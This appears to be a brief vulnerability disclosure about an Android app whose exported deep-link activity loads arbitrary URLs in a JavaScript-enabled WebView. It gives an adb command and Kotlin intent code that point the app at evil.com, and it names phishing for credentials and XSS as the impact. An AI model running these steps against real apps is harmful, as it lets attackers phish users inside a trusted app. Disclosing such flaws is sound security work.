<p>The app can be launched by any other app because its deeplink activity is <code>exported=true.</code></p>
<h2 id="heading-adb-exploit">Adb exploit</h2>
<pre><code class="lang-bash">adb shell am start -a android.intent.action.VIEW -n com.redacted.android/<span class="hljs-string">"com.redacted.activities.DeepLinkActivity"</span> -d <span class="hljs-string">"https://evil.com"</span>
</code></pre>
<h2 id="heading-apk-exploit">Apk Exploit</h2>
<pre><code class="lang-kotlin">Intent intent = new Intent();       intent.setClassName(<span class="hljs-string">"com.redacted.android"</span>,<span class="hljs-string">"com.redcated.android.activities.DeepLinkActivity"</span>);
intent.setData(Uri.parse(<span class="hljs-string">"https://evil.com"</span>));
startActivity(intent);
</code></pre>
<h2 id="heading-impact">Impact</h2>
<p>The attcker can craft a phishing page and grab the credentails. or can launch a xss attack because the webview has <code>javascriptenabled(true)</code>. Most of the case the victim believe it as an legitimate url because it is loading in legititmate vulnerable app</p>


The app can be launched by any other app because its deeplink activity is `exported=true.`

## Adb exploit

```bash
adb shell am start -a android.intent.action.VIEW -n com.redacted.android/"com.redacted.activities.DeepLinkActivity" -d "https://evil.com"
```

## Apk Exploit

```kotlin
Intent intent = new Intent();       intent.setClassName("com.redacted.android","com.redcated.android.activities.DeepLinkActivity");
intent.setData(Uri.parse("https://evil.com"));
startActivity(intent);
```

## Impact

The attcker can craft a phishing page and grab the credentails. or can launch a xss attack because the webview has `javascriptenabled(true)`. Most of the case the victim believe it as an legitimate url because it is loading in legititmate vulnerable app

Phishing in Android

Table of contents

Adb exploit

Apk Exploit

Impact